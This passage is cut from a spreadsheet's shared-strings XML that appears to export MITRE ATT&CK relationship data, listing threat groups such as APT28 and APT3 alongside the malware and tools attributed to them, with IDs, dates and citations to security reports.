    <t>relationship--de979692-5ca5-4874-bfc8-91cea8697ef1</t>
  </si>
  <si>
    <t>S0123</t>
  </si>
  <si>
    <t>xCmd</t>
  </si>
  <si>
    <t>tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--cf467be5-c162-4763-801b-32cb57a514ef</t>
  </si>
  <si>
    <t>G0005</t>
  </si>
  <si>
    <t>APT12</t>
  </si>
  <si>
    <t>intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb</t>
  </si>
  <si>
    <t>S0040</t>
  </si>
  <si>
    <t>HTRAN</t>
  </si>
  <si>
    <t>tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e</t>
  </si>
  <si>
    <t>(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>relationship--f42a5342-c28d-46ad-bbd7-3123da43ff86</t>
  </si>
  <si>
    <t>07 June 2019</t>
  </si>
  <si>
    <t>10 June 2019</t>
  </si>
  <si>
    <t>S0015</t>
  </si>
  <si>
    <t>Ixeshe</t>
  </si>
  <si>
    <t>malware--8beac7c2-48d2-4cd9-9b15-6c452f38ac06</t>
  </si>
  <si>
    <t>(Citation: Moran 2013)(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>relationship--762f85a3-0120-4b09-aafd-3f460764e85f</t>
  </si>
  <si>
    <t>S0003</t>
  </si>
  <si>
    <t>RIPTIDE</t>
  </si>
  <si>
    <t>malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e</t>
  </si>
  <si>
    <t>(Citation: Moran 2014)</t>
  </si>
  <si>
    <t>relationship--d242dc5a-3969-498c-b7eb-5d850e7d384d</t>
  </si>
  <si>
    <t>G0023</t>
  </si>
  <si>
    <t>APT16</t>
  </si>
  <si>
    <t>intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70</t>
  </si>
  <si>
    <t>S0064</t>
  </si>
  <si>
    <t>ELMER</t>
  </si>
  <si>
    <t>malware--3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c</t>
  </si>
  <si>
    <t>(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>relationship--bcd1d261-0228-468f-b02b-52e6784e2491</t>
  </si>
  <si>
    <t>26 July 2022</t>
  </si>
  <si>
    <t>G0025</t>
  </si>
  <si>
    <t>APT17</t>
  </si>
  <si>
    <t>intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae</t>
  </si>
  <si>
    <t>S0069</t>
  </si>
  <si>
    <t>BLACKCOFFEE</t>
  </si>
  <si>
    <t>malware--d69c8146-ab35-4d50-8382-6fc80e641d43</t>
  </si>
  <si>
    <t>(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>relationship--a33388b7-3803-442f-8e31-511eef055470</t>
  </si>
  <si>
    <t>22 March 2019</t>
  </si>
  <si>
    <t>G0026</t>
  </si>
  <si>
    <t>APT18</t>
  </si>
  <si>
    <t>intrusion-set--38fd6a28-3353-4f2b-bb2b-459fecd5c648</t>
  </si>
  <si>
    <t>S0070</t>
  </si>
  <si>
    <t>HTTPBrowser</t>
  </si>
  <si>
    <t>malware--e066bf86-9cfb-407a-9d25-26fd5d91e360</t>
  </si>
  <si>
    <t>(Citation: RSA2017 Detect and Respond Adair)</t>
  </si>
  <si>
    <t>relationship--e9612cb1-79a5-4987-aa83-b84aa7fa050f</t>
  </si>
  <si>
    <t>16 June 2021</t>
  </si>
  <si>
    <t>S0124</t>
  </si>
  <si>
    <t>Pisloader</t>
  </si>
  <si>
    <t>malware--b96680d1-5eb3-4f07-b95c-00ab904ac236</t>
  </si>
  <si>
    <t>(Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>relationship--95842c88-c596-44c7-a16e-40d98e2457cc</t>
  </si>
  <si>
    <t>30 May 2019</t>
  </si>
  <si>
    <t>(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>relationship--89c6bcd7-e330-4902-8296-0918923d6573</t>
  </si>
  <si>
    <t>relationship--80c071f7-123e-468f-800d-726a1d3e4144</t>
  </si>
  <si>
    <t>S0071</t>
  </si>
  <si>
    <t>hcdLoader</t>
  </si>
  <si>
    <t>malware--9e2bba94-950b-4fcf-8070-cb3f816c5f4e</t>
  </si>
  <si>
    <t>(Citation: Dell Lateral Movement)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>relationship--7dc4c8b9-a380-4dc0-9973-a8a2f8d0175c</t>
  </si>
  <si>
    <t>G0073</t>
  </si>
  <si>
    <t>APT19</t>
  </si>
  <si>
    <t>intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6</t>
  </si>
  <si>
    <t>(Citation: FireEye APT19)</t>
  </si>
  <si>
    <t>relationship--5f830006-234e-44d1-9441-1aca7990006c</t>
  </si>
  <si>
    <t>06 November 2020</t>
  </si>
  <si>
    <t>(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>relationship--89b157e1-3972-421e-87c9-f9e83b26ec90</t>
  </si>
  <si>
    <t>12 March 2019</t>
  </si>
  <si>
    <t>25 January 2021</t>
  </si>
  <si>
    <t>G0007</t>
  </si>
  <si>
    <t>APT28</t>
  </si>
  <si>
    <t>intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c</t>
  </si>
  <si>
    <t>S0045</t>
  </si>
  <si>
    <t>ADVSTORESHELL</t>
  </si>
  <si>
    <t>malware--fb575479-14ef-41e9-bfab-0b7cf10bec73</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>relationship--5e9bee3d-ea86-4715-9fdc-199e10ef2161</t>
  </si>
  <si>
    <t>09 September 2019</t>
  </si>
  <si>
    <t>S0023</t>
  </si>
  <si>
    <t>CHOPSTICK</t>
  </si>
  <si>
    <t>malware--ccd61dfc-b03f-4689-8c18-7c97eab08472</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28)(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--24013fde-5ce7-4995-9d9f-d2ced31b9d9a</t>
  </si>
  <si>
    <t>S0137</t>
  </si>
  <si>
    <t>CORESHELL</t>
  </si>
  <si>
    <t>malware--60c18d06-7b91-4742-bae3-647845cd9d81</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--ba64e6d1-4deb-440a-a4eb-1c3476b6fb47</t>
  </si>
  <si>
    <t>S0351</t>
  </si>
  <si>
    <t>Cannon</t>
  </si>
  <si>
    <t>malware--d20b397a-ea47-48a9-b503-2e2a3551e11d</t>
  </si>
  <si>
    <t>(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>relationship--5f402d02-94f9-49de-b097-2d89c59de394</t>
  </si>
  <si>
    <t>20 March 2020</t>
  </si>
  <si>
    <t>S0243</t>
  </si>
  <si>
    <t>DealersChoice</t>
  </si>
  <si>
    <t>malware--8f460983-1bbb-4e7e-8094-f0b5e720f658</t>
  </si>
  <si>
    <t>(Citation: Sofacy DealersChoice)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--5377a247-28a9-4dc1-957f-78980504a5a3</t>
  </si>
  <si>
    <t>S0134</t>
  </si>
  <si>
    <t>Downdelph</t>
  </si>
  <si>
    <t>malware--08d20cd2-f084-45ee-8558-fa6ef5a18519</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--c84b3859-ba18-45bd-8f56-baa045ce8eab</t>
  </si>
  <si>
    <t>S0502</t>
  </si>
  <si>
    <t>Drovorub</t>
  </si>
  <si>
    <t>malware--99164b38-1775-40bc-b77b-a2373b14540a</t>
  </si>
  <si>
    <t>(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--949dba3e-e6c9-48a5-8bf6-a2a912c7c3e3</t>
  </si>
  <si>
    <t>18 September 2020</t>
  </si>
  <si>
    <t>S0193</t>
  </si>
  <si>
    <t>Forfiles</t>
  </si>
  <si>
    <t>tool--90ec2b22-7061-4469-b539-0989ec4f96c2</t>
  </si>
  <si>
    <t>(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>relationship--50a57369-6d3e-44bf-814f-7c9242e56d75</t>
  </si>
  <si>
    <t>S0410</t>
  </si>
  <si>
    <t>Fysbis</t>
  </si>
  <si>
    <t>malware--50d6688b-0985-4f3d-8cbe-0c796b30703b</t>
  </si>
  <si>
    <t>(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>relationship--f755463c-28a6-4e47-8b13-1028806f5032</t>
  </si>
  <si>
    <t>S0135</t>
  </si>
  <si>
    <t>HIDEDRV</t>
  </si>
  <si>
    <t>malware--e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--720c211e-2219-496d-8a34-c3f37dfbe5bf</t>
  </si>
  <si>
    <t>S0044</t>
  </si>
  <si>
    <t>JHUHUGIT</t>
  </si>
  <si>
    <t>malware--8ae43c46-57ef-47d5-a77a-eebb35628db2</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28 January 2017)(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--75d04175-c43d-46cd-be08-5f4c91f767ed</t>
  </si>
  <si>
    <t>S0250</t>
  </si>
  <si>
    <t>Koadic</t>
  </si>
  <si>
    <t>tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Sofacy 06-2018)</t>
  </si>
  <si>
    <t>relationship--7a3963b8-3ffd-41a9-bd03-57cba4f03882</t>
  </si>
  <si>
    <t>S0162</t>
  </si>
  <si>
    <t>Komplex</t>
  </si>
  <si>
    <t>malware--f108215f-3487-489d-be8b-80e346d32518</t>
  </si>
  <si>
    <t>(Citation: XAgentOSX 2017)(Citation: Sofacy Komplex Trojan)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--63841959-afe2-4cb0-a93e-d407eb1b8d66</t>
  </si>
  <si>
    <t>S0397</t>
  </si>
  <si>
    <t>LoJax</t>
  </si>
  <si>
    <t>malware--b865dded-0553-4962-a44b-6fe7863effed</t>
  </si>
  <si>
    <t>(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>relationship--fb28df7f-ccc1-469d-8a91-e82b9b6006c1</t>
  </si>
  <si>
    <t>02 July 2019</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>relationship--5cfcbf60-454a-4673-aa93-9020d04efab7</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--4a1336e8-9abb-4217-8a90-78ce55325aaa</t>
  </si>
  <si>
    <t>S0138</t>
  </si>
  <si>
    <t>OLDBAIT</t>
  </si>
  <si>
    <t>malware--2dd34b01-6110-4aac-835d-b5e7b936b0be</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>relationship--bceada36-e6ba-49b9-b9f8-99e37e6cbf9e</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: FireEye APT28 Hospitality Aug 2017)(Citation: US District Court Indictment GRU Oct 2018) </t>
  </si>
  <si>
    <t>relationship--89363ca8-1cf3-4c40-972c-6e2787a05b43</t>
  </si>
  <si>
    <t>06 October 2020</t>
  </si>
  <si>
    <t>relationship--b997c08e-f005-432f-8030-1903d18eec51</t>
  </si>
  <si>
    <t>S0136</t>
  </si>
  <si>
    <t>USBStealer</t>
  </si>
  <si>
    <t>malware--af2ad3b7-ab6a-4807-91fd-51bcaff9acbb</t>
  </si>
  <si>
    <t>relationship--d26b3aeb-972f-471e-ab59-dc1ee2aa532e</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>relationship--0e8f455a-5773-483a-8636-045774732bef</t>
  </si>
  <si>
    <t>21 September 2021</t>
  </si>
  <si>
    <t>S0191</t>
  </si>
  <si>
    <t>Winexe</t>
  </si>
  <si>
    <t>tool--96fd6cc4-a693-4118-83ec-619e5352d07d</t>
  </si>
  <si>
    <t>(Citation: Überwachung APT28 Forfiles June 2015)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--80b30059-28a5-4eaa-9d7c-193875bbccd0</t>
  </si>
  <si>
    <t>S0161</t>
  </si>
  <si>
    <t>XAgentOSX</t>
  </si>
  <si>
    <t>malware--59a97b15-8189-4d51-9404-e1ce8ea4a069</t>
  </si>
  <si>
    <t>(Citation: XAgentOSX 2017)(Citation: Symantec APT28 Oct 2018)(Citation: US District Court Indictment GRU Oct 2018)</t>
  </si>
  <si>
    <t>relationship--cfe2a359-bbab-4520-bdd7-b2d6abf742cc</t>
  </si>
  <si>
    <t>S0117</t>
  </si>
  <si>
    <t>XTunnel</t>
  </si>
  <si>
    <t>malware--7343e208-7cab-45f2-a47b-41ba5e2f0fab</t>
  </si>
  <si>
    <t>(Citation: ESET Sednit Part 3)(Citation: Symantec APT28 Oct 2018)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)</t>
  </si>
  <si>
    <t>relationship--92c68b65-18b8-44e9-a368-692048ba9611</t>
  </si>
  <si>
    <t>S0251</t>
  </si>
  <si>
    <t>Zebrocy</t>
  </si>
  <si>
    <t>malware--a4f57468-fbd5-49e4-8476-52088220b92d</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: ESET Zebrocy May 2019)</t>
  </si>
  <si>
    <t>relationship--d2fa6899-2529-45b1-86bf-f2c5475a2ea6</t>
  </si>
  <si>
    <t>S0160</t>
  </si>
  <si>
    <t>certutil</t>
  </si>
  <si>
    <t>tool--0a68f1f1-da74-4d28-8d9a-696c082706cc</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)</t>
  </si>
  <si>
    <t>relationship--1c8634d8-21a1-46a5-a1fd-eaaff6eed7a6</t>
  </si>
  <si>
    <t>S0677</t>
  </si>
  <si>
    <t>AADInternals</t>
  </si>
  <si>
    <t>tool--2c5281dd-b5fd-4531-8aea-c1bf8a0f8756</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>relationship--70ceb05c-ed86-4b51-bde0-2455662c30b7</t>
  </si>
  <si>
    <t>01 February 2022</t>
  </si>
  <si>
    <t>(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: CrowdStrike StellarParticle January 2022)(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>relationship--b22b0a6c-5960-4232-9fb6-bae84fcc07ca</t>
  </si>
  <si>
    <t>(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>relationship--41760330-2558-4781-bc4e-1e4c7a1f5f92</t>
  </si>
  <si>
    <t>S0635</t>
  </si>
  <si>
    <t>BoomBox</t>
  </si>
  <si>
    <t>malware--c26f1c05-b861-4970-94dc-2f7f921a3074</t>
  </si>
  <si>
    <t>(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--e0ce9848-5b27-4fb5-ba67-0fef8cd0fe0f</t>
  </si>
  <si>
    <t>S0054</t>
  </si>
  <si>
    <t>CloudDuke</t>
  </si>
  <si>
    <t>malware--cbf646f1-7db5-4dc6-808b-0094313949df</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--a7180b8e-c580-49ab-bbfb-e56e8ab48823</t>
  </si>
  <si>
    <t>25 July 2019</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</si>
  <si>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</si>
  <si>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relationship--d9beae20-bd32-4141-95ff-053cf46e8210</t>
  </si>
  <si>
    <t>S0050</t>
  </si>
  <si>
    <t>CosmicDuke</t>
  </si>
  <si>
    <t>malware--2eb9b131-d333-4a48-9eb4-d8dec46c19ee</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>relationship--eeae630c-0c58-4397-90fb-05f5b60b720f</t>
  </si>
  <si>
    <t>S0046</t>
  </si>
  <si>
    <t>CozyCar</t>
  </si>
  <si>
    <t>malware--e6ef745b-077f-42e1-a37d-29eecff9c754</t>
  </si>
  <si>
    <t>relationship--0585e082-8f8e-4162-b4a8-3c1cef02f7e3</t>
  </si>
  <si>
    <t>S0634</t>
  </si>
  <si>
    <t>EnvyScout</t>
  </si>
  <si>
    <t>malware--2f8229dc-da94-41c6-89ba-b5b6c32f6b7d</t>
  </si>
  <si>
    <t>relationship--316bb062-76c2-4894-9f4e-57fa0938e6a4</t>
  </si>
  <si>
    <t>(Citation: ESET Dukes October 2019)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>relationship--27785084-70d5-4b4d-b8d0-9ab250ade9f5</t>
  </si>
  <si>
    <t>S0661</t>
  </si>
  <si>
    <t>FoggyWeb</t>
  </si>
  <si>
    <t>malware--72911fe3-f085-40f7-b4f2-f25a4221fe44</t>
  </si>
  <si>
    <t>(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--517735b6-69f4-4188-8fef-45981220e4bc</t>
  </si>
  <si>
    <t>17 November 2021</t>
  </si>
  <si>
    <t>S0049</t>
  </si>
  <si>
    <t>GeminiDuke</t>
  </si>
  <si>
    <t>malware--199463de-d9be-46d6-bb41-07234c1dd5a6</t>
  </si>
  <si>
    <t>relationship--3ae8d262-d2f8-4fa5-adb4-e379d43b9c37</t>
  </si>
  <si>
    <t>(Citation: MSTIC NOBELIUM Mar 2021)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>relationship--b08841ec-c80e-409e-90d1-cfb1cb191da4</t>
  </si>
  <si>
    <t>(Citation: MSTIC NOBELIUM Mar 2021)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>relationship--48c43e15-210c-491f-9198-928b583470d9</t>
  </si>
  <si>
    <t>S0037</t>
  </si>
  <si>
    <t>HAMMERTOSS</t>
  </si>
  <si>
    <t>malware--2daa14d6-cbf3-4308-bb8e-213c324a08e4</t>
  </si>
  <si>
    <t>relationship--df9beafa-be6b-4e61-9a27-dfb9ec7d6aa3</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT29 Eye Spy Email Nov 22)</t>
  </si>
  <si>
    <t>relationship--d430bf8d-cbe9-4f0d-8040-7f7d66fcc204</t>
  </si>
  <si>
    <t>17 August 2023</t>
  </si>
  <si>
    <t>S0513</t>
  </si>
  <si>
    <t>LiteDuke</t>
  </si>
  <si>
    <t>malware--95e2cbae-d82c-4f7b-b63c-16462015d35d</t>
  </si>
  <si>
    <t>relationship--fd419d0b-d019-47f2-83a5-a8459ee9ed4b</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: Microsoft 365 Defender Solorigate)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>relationship--067814b5-aa57-45e0-9bdf-5536b077c224</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>relationship--7243a679-467e-4c31-b413-547016b9c3ad</t>
  </si>
  <si>
    <t>S0637</t>
  </si>
  <si>
    <t>NativeZone</t>
  </si>
  <si>
    <t>malware--b4783be3-35d9-4a56-ac8d-1f3e1c9d9a84</t>
  </si>
  <si>
    <t>(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>relationship--bda1324a-9c51-4d91-bf21-39209633b985</t>
  </si>
  <si>
    <t>(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--db80dd29-d335-48b9-853e-5f15e576acb3</t>
  </si>
  <si>
    <t>S0052</t>
  </si>
  <si>
    <t>OnionDuke</t>
  </si>
  <si>
    <t>malware--b136d088-a829-432c-ac26-5529c26d4c7e</t>
  </si>
  <si>
    <t>relationship--1593ae11-0bb5-4e16-804a-1383eb0cced5</t>
  </si>
  <si>
    <t>S0150</t>
  </si>
  <si>
    <t>POSHSPY</t>
  </si>
  <si>
    <t>malware--5e595477-2e78-4ce7-ae42-e0b059b17808</t>
  </si>
  <si>
    <t>(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>relationship--2db640ab-413b-4c49-9842-3bf190c5e184</t>
  </si>
  <si>
    <t>S0048</t>
  </si>
  <si>
    <t>PinchDuke</t>
  </si>
  <si>
    <t>malware--ae9d818d-95d0-41da-b045-9cabea1ca164</t>
  </si>
  <si>
    <t>relationship--02462741-4148-48b3-881b-1b813ce62fcc</t>
  </si>
  <si>
    <t>relationship--6aaca244-805c-4aba-b923-40407b034662</t>
  </si>
  <si>
    <t>23 September 2020</t>
  </si>
  <si>
    <t>S0139</t>
  </si>
  <si>
    <t>PowerDuke</t>
  </si>
  <si>
    <t>malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a</t>
  </si>
  <si>
    <t>(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>relationship--da3a85c7-7590-48b1-8a22-2f8b00060f83</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--ba1a4084-a74f-44d6-bafe-7a09ee959270</t>
  </si>
  <si>
    <t>S1084</t>
  </si>
  <si>
    <t>QUIETEXIT</t>
  </si>
  <si>
    <t>malware--4816d361-f82b-4a18-aa05-b215e7cf9200</t>
  </si>
  <si>
    <t>relationship--df6ec6c4-6ae9-4f54-a0fb-0937f5a3bf01</t>
  </si>
  <si>
    <t>S0684</t>
  </si>
  <si>
    <t>ROADTools</t>
  </si>
  <si>
    <t>tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d</t>
  </si>
  <si>
    <t>relationship--02fa6833-f06f-4808-ab69-ca565b691e40</t>
  </si>
  <si>
    <t>31 January 2022</t>
  </si>
  <si>
    <t>(Citation: Symantec RAINDROP January 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>relationship--a45bd763-a162-4b02-86f2-6042ff0eaa4a</t>
  </si>
  <si>
    <t>relationship--a4eb7719-b7e3-438e-8cb6-ebd576e74bbb</t>
  </si>
  <si>
    <t>S0195</t>
  </si>
  <si>
    <t>SDelete</t>
  </si>
  <si>
    <t>tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153</t>
  </si>
  <si>
    <t>(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>relationship--63185895-4afb-4886-adcc-fbfac1a117d6</t>
  </si>
  <si>
    <t>(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>relationship--f5e2c4ef-fe56-416e-8d74-733272c7310b</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--cf2da3ab-4210-4a4b-932c-15dcc8b9c73f</t>
  </si>
  <si>
    <t>S0053</t>
  </si>
  <si>
    <t>SeaDuke</t>
  </si>
  <si>
    <t>malware--67e6d66b-1b82-4699-b47a-e2efb6268d14</t>
  </si>
  <si>
    <t>(Citation: F-Secure The Dukes)(Citation: Secureworks IRON HEMLOCK Profile)(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>relationship--8d6cf235-4a33-4866-9b73-a7119293e5db</t>
  </si>
  <si>
    <t>relationship--a34de077-b25d-479b-8001-897efde4b0c5</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>relationship--ed096691-23a6-4104-879d-5e96d257b3f0</t>
  </si>
  <si>
    <t>30 July 2021</t>
  </si>
  <si>
    <t>S0516</t>
  </si>
  <si>
    <t>SoreFang</t>
  </si>
  <si>
    <t>malware--e33e4603-afab-402d-b2a1-248d435b5fe0</t>
  </si>
  <si>
    <t>(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--364d9326-12af-4449-924c-8063f4b3aa41</t>
  </si>
  <si>
    <t>relationship--c8a02e92-6b53-4c1f-ae1f-bebedd6bedc7</t>
  </si>
  <si>
    <t>(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>relationship--79b3c546-efbf-4642-b5f1-61d4b497d4b9</t>
  </si>
  <si>
    <t>relationship--13cd473c-1953-45d2-8508-faf8c1b6a941</t>
  </si>
  <si>
    <t>relationship--bd5b6f31-2248-4af8-8e8e-e3273aaa57e4</t>
  </si>
  <si>
    <t>relationship--10f89ca3-e540-4f36-9a21-eca24a0224a7</t>
  </si>
  <si>
    <t>S0636</t>
  </si>
  <si>
    <t>VaporRage</t>
  </si>
  <si>
    <t>malware--96eca9b9-b37f-42f1-96dc-a2c441403194</t>
  </si>
  <si>
    <t>relationship--fab45ac3-d359-4493-8ae0-02675158710e</t>
  </si>
  <si>
    <t>S0515</t>
  </si>
  <si>
    <t>WellMail</t>
  </si>
  <si>
    <t>malware--959f3b19-2dc8-48d5-8942-c66813a5101a</t>
  </si>
  <si>
    <t>(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>relationship--0465916e-9561-4518-b2fa-09be21bc04e1</t>
  </si>
  <si>
    <t>29 September 2020</t>
  </si>
  <si>
    <t>S0514</t>
  </si>
  <si>
    <t>WellMess</t>
  </si>
  <si>
    <t>malware--3a4197ae-ec63-4162-907b-9a073d1157e4</t>
  </si>
  <si>
    <t>(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>relationship--f72527b3-98cb-4df6-9c52-9faef40206a0</t>
  </si>
  <si>
    <t>relationship--cb1dab47-1a8e-431c-adc9-51d341ce435e</t>
  </si>
  <si>
    <t>S0175</t>
  </si>
  <si>
    <t>meek</t>
  </si>
  <si>
    <t>tool--65370d0b-3bd4-4653-8cf9-daf56f6be830</t>
  </si>
  <si>
    <t>relationship--0e0197fe-eca5-4d70-bf72-2d9092bc777b</t>
  </si>
  <si>
    <t>G0022</t>
  </si>
  <si>
    <t>APT3</t>
  </si>
  <si>
    <t>intrusion-set--0bbdf25b-30ff-4894-a1cd-49260d0dd2d9</t>
  </si>
  <si>
    <t>S0349</t>
  </si>
  <si>
    <t>LaZagne</t>
  </si>
  <si>
    <t>tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b</t>
  </si>
  <si>
    <t>(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>relationship--5b50193e-6a97-432a-8839-6bb18e88271f</t>
  </si>
  <si>
    <t>29 April 2019</t>
  </si>
  <si>
    <t>S0165</t>
  </si>
  <si>
    <t>OSInfo</t>
  </si>
  <si>
    <t>malware--f6d1d2cb-12f5-4221-9636-44606ea1f3f8</t>
  </si>
  <si>
    <t>relationship--16ef3e00-dc40-462c-9b74-5e8a8b24c86e</t>
  </si>
  <si>
    <t>S0013</t>
  </si>
  <si>
    <t>PlugX</t>
  </si>
  <si>
    <t>malware--64fa0de0-6240-41f4-8638-f4ca7ed528fd</t>
  </si>
  <si>
    <t>(Citation: FireEye Clandestine Fox Part 2)</t>
  </si>
  <si>
    <t>relationship--3427863f-d4c4-4272-ad60-1479e42ed4af</t>
  </si>
  <si>
    <t>S0166</t>
  </si>
  <si>
    <t>RemoteCMD</t>
  </si>
  <si>
    <t>malware--4e6b9625-bbda-4d96-a652-b3bb45453f26</t>
  </si>
  <si>
    <t>relationship--f24d37c0-283d-4f37-8278-07fc75cc0e94</t>
  </si>
  <si>
    <t>S0063</t>
  </si>
  <si>
    <t>SHOTPUT</t>
  </si>
  <si>
    <t>malware--58adaaa8-f1e8-4606-9a08-422e568461eb</t>
  </si>
  <si>
    <t>(Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
